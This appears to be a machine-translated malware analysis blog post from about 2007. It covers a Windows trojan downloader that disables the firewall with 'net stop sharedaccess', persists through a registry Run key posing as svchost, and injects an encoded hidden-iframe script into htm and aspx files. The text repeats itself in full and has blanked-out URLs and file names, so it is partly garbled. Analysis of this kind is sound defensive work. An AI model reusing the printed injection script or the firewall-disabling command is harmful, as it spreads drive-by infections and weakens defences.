Seeing this news at FF..., he unpacked the webpage...
It turned out to be an "old friend" Assassin Group... has dealt with the netmasters generated by this group many times...
There is a * horse hanging
hxxp:///pic/ddb/
Let's make an analysis here...
Run the sample.
Release the file
C:\
Call cmd to run the command /c net stop sharedaccess
Visit the website
61.129.102.79
The address should be: hxxp:// port 80 communication
Download:hxxp:///es86/db/
This file is a rar file..
Release the file as
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\mop
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\moz
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
Write to the registry
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"svchost"="C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\"
Add code at the end of htm and aspx
<script>
p="60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,104,116,116,112,58,47,47,97,45,108,46,109,101,105,98,117,46,99,111,109,47,34,62,60,47,105,102,114,97,109,101,62"
p=eval("("+p+")");
(p);</script>
Decrypted as
<script>
p="<iframe height=0 width=0 src="/"></iframe>"
p=eval("("+p+")");
(p);</script>
Online scan
AntiVir 7.3.1.38 03.02.2007 TR/
BitDefender 7.2 03.02.2007 DeepScan:.D212BB22
eSafe 7.0.14.0 02.28.2007 suspicious */Worm
F-Secure 6.70.13030.0 03.02.2007 W32/Downloader
Ikarus T3.1.1.3 03.02.2007 Backdoor.
NOD32v2 2090 03.02.2007 a variant of Win32/
Norman 5.80.02 03.02.2007 W32/Downloader
Panda 9.0.0.4 03.01.2007 Suspicious file
All the above analysis was done in the virtual machine..
The shell added this time is really unavailable... I can't see more details...
However, it is speculated that the writing language is Borland Delphi 6.0-7.0
Try to close some security software. I guess there are also...
=.= I sigh again... What a broken shell...
It turned out to be an "old friend" Assassin Group... has dealt with the netmasters generated by this group many times...
There is a * horse hanging
hxxp:///pic/ddb/
Let's make an analysis here...
Run the sample.
Release the file
C:\
Call cmd to run the command /c net stop sharedaccess
Visit the website
61.129.102.79
The address should be: hxxp:// port 80 communication
Download:hxxp:///es86/db/
This file is a rar file..
Release the file as
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\mop
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\moz
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\
Write to the registry
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"svchost"="C:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bots\vinavbar\"
Add code at the end of htm and aspx
<script>
p="60,105,102,114,97,109,101,32,104,101,105,103,104,116,61,48,32,119,105,100,116,104,61,48,32,115,114,99,61,34,104,116,116,112,58,47,47,97,45,108,46,109,101,105,98,117,46,99,111,109,47,34,62,60,47,105,102,114,97,109,101,62"
p=eval("("+p+")");
(p);</script>
Decrypted as
<script>
p="<iframe height=0 width=0 src="/"></iframe>"
p=eval("("+p+")");
(p);</script>
Online scan
AntiVir 7.3.1.38 03.02.2007 TR/
BitDefender 7.2 03.02.2007 DeepScan:.D212BB22
eSafe 7.0.14.0 02.28.2007 suspicious */Worm
F-Secure 6.70.13030.0 03.02.2007 W32/Downloader
Ikarus T3.1.1.3 03.02.2007 Backdoor.
NOD32v2 2090 03.02.2007 a variant of Win32/
Norman 5.80.02 03.02.2007 W32/Downloader
Panda 9.0.0.4 03.01.2007 Suspicious file
All the above analysis was done in the virtual machine..
The shell added this time is really unavailable... I can't see more details...
However, it is speculated that the writing language is Borland Delphi 6.0-7.0
Try to close some security software. I guess there are also...
=.= I sigh again... What a broken shell...